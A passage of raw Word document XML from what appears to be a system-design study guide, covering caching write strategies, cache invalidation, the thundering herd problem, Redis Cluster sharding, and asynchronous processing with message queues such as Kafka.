          <w:ilvl w:val="0"/>
          <w:numId w:val="122"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Write operation: Cache.set(key, value) + DB.write(key, value) — both must succeed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FAD925" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="122"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Usually implemented as cache.set first, then DB.write, with rollback if DB fails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73692359" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Advantage:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Cache never has stale data. </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Disadvantage:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Write latency increases (two writes per operation). Caches data that may never be read.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237E1567" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Write-Behind (Write-Back):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3707E4DD" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="123"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Application writes ONLY to cache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E3C0F6" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="123"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Cache asynchronously flushes writes to database (batched, on a timer).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706E6C90" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Internals:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5747D04A" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="124"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Write completes instantly (just a cache write, sub-millisecond).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790E8A03" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="124"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>A background process collects dirty entries and bulk-writes to DB periodically (e.g., every 100ms or every 1000 entries).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD17AD8" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Advantage:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Extremely fast writes. Batching reduces DB load. </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Disadvantage:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Data loss risk — if the cache crashes before flushing, writes are lost. Complex to implement correctly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28627DB9" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.3 Cache Invalidation — The Hardest Problem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657DE019" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>"There are only two hard things in Computer Science: cache invalidation and naming things."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290AFA46" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why it's hard:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25300515" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>When the underlying data changes, how do you ensure the cache doesn't serve stale data?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3FAC34" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Strategies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBE1BDC" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="125"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TTL (Time-To-Live):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373FA003" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="125"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Set an expiration: "this entry is valid for 60 seconds."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEA6BCF" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="125"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>After 60 seconds, it's evicted/treated as miss.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22369A13" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="125"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Simple but imprecise: data could be stale for up to 60 seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C19562" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="125"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Event-driven invalidation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548C9935" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="125"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>When data changes, publish an event (via message queue).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DE6078" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="125"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:lastRenderedPageBreak/>
        <w:t>Cache subscribers listen for events and delete the relevant key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E27A9BE" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="125"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>More precise, but adds infrastructure (message broker) and complexity (what if the event is lost?).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A7C92C" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="125"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Version-based:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DD6D15" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="125"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Cache keys include a version number: user:123:v5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EAE9F22" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="125"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>When data changes, increment version to v6.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1BD9C2" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="125"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Old cache entries are never read (wrong version), naturally expire via TTL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137DAB71" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The thundering herd on cache expiration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5726B7DC" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="126"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>A popular cache key expires.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03685A67" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="126"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>10,000 concurrent requests all miss the cache simultaneously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5560CEF9" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="126"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>All 10,000 hit the database with the same query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF11114" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="126"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Database overloads and crashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24291850" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solutions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57968C34" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="127"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mutex/lock:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> First request to miss acquires a lock, fetches from DB, populates cache. Other requests wait (or return stale data).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458D8A3F" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="127"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Early expiration (stale-while-revalidate):</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Cache entry has two TTLs — soft TTL (revalidate) and hard TTL (truly expired). After soft TTL, serve stale data while ONE request refreshes in the background.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FD672E" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="127"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pre-warming:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Before TTL expires, a background process proactively refreshes popular keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516C36D0" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.4 Cache Scaling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7FA101" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Distributed caching (e.g., Redis Cluster, Memcached):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E507C3B" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="128"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Data is sharded across multiple cache nodes using consistent hashing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BAA73F" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="128"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Each node holds a subset of keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AEDE1F" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="128"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Adding nodes increases total cache memory and throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468C3AFB" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How Redis Cluster works internally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBF825C" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="129"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>16,384 hash slots. Each key hashes to a slot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F8A85D" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="129"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:lastRenderedPageBreak/>
        <w:t>Slots are distributed among master nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435FC051" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="129"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Client-side routing: The client knows which node owns which slots (via cluster topology map).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B61B6AC" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="129"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>If a request goes to the wrong node, it receives a MOVED redirect.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA9B6C1" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:pict w14:anchorId="77343A47">
          <v:rect id="_x0000_i2291" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD4F4E3" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. Asynchronous Processing and Message Queues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C37C29" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.1 Why Async is a Scalability Mechanism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617F069C" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The synchronous problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612D8714" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="130"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>User uploads a video.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA40680" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="130"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Server receives video.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719A161E" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="130"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Server transcodes video (takes 5 minutes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4F70E3" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="130"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Server responds to user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AA9532" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>During those 5 minutes, one thread is blocked. Under load, you run out of threads. Users queue up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2A8C1C" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The async solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674DEC0E" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="131"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>User uploads a video.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3365C5C7" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="131"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Server receives video, puts a "transcode this" message on a queue.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62614453" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="131"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Server immediately responds: "Upload received, processing."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4887069C" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="131"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>A separate worker (pool) pulls from the queue and transcodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F155C12" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Scalability impact:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717A10BA" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="132"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Web servers handle requests in milliseconds, not minutes. Can serve orders of magnitude more users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E0A8E0" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="132"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Workers scale independently — add more workers to process the queue faster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBB9C93" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="132"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Queue acts as a buffer — absorbs traffic spikes without dropping requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B728F57" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.2 Message Queue Internals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F1D194" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How a queue like Kafka works internally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C01CD7E" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Topics and Partitions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C35337C" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="133"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:lastRenderedPageBreak/>
        <w:t>A topic (e.g., "video-uploads") is split into N partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20051EA6" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="133"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Each partition is an ordered, append-only log.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7590DB" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="133"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Messages within a partition are assigned sequential offsets (0, 1, 2, ...).</w:t>
      </w:r>
    </w:p>
